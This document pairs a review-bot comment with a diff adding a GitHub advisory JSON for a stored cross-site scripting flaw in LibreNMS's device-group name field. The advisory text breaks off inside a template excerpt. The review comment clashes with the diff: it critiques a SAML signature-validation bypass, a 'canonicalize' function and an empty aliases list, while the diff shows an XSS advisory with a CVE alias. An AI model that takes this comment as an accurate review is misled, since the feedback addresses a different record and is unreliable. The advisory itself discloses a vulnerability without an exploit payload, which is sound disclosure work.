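Review bot: The Severity section of `details` ends with "(see References)" for the downstream SAML signature-validation bypass, but the `references` array holds only the advisory URL and the package URL, so the material the text points to is not reachable from this record. Add the downstream advisory (and the fixing commit, if it is public) as `references` entries, or drop the pointer. `aliases` is also empty, so tooling keyed on CVE identifiers presumably cannot match this record until one is assigned. For callers that cannot yet move to `>= 1.19.1`, one mitigation line would help: treat an empty result from `canonicalize` as a failure rather than as canonical output.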
diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..39b124c867160 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-18T22:07:19Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n